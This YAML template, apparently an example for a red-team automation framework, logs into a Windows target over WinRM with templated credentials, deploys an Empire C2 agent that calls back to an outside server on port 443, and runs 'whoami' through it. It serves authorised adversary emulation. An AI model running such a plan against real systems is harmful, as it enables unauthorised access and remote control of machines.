---
name: Empire agents on Windows example
metadata:
  description: This example shows how to deploy an Empire agent and execute a command command with the deployed agent.
stages:
  stage-one:
    steps:
      create-ssh-session:
        is_init: true
        module: metasploit
        arguments:
          module_name: scanner/winrm/winrm_login
          datastore:
            RHOSTS: {{ target.address }}
            USERNAME: {{ target.username }}
            PASSWORD: {{ target.password }}
        next:
          - type: state
            value: finished
            step: deploy-agent

      deploy-agent:
        module: empire
        arguments:
          action: deploy
          agent_name: MyAgent
          session_id: $create-ssh-session.session_id
          listener:
            name: testing
            port: 443
            options:
              Host: {{ empire_server_address }}
          stager:
            type: multi/launcher
        next:
          - type: state
            value: finished
            step: whoami-on-agent

      whoami-on-agent:
        module: empire
        arguments:
          action: execute-command
          agent_name: MyAgent
          command: whoami
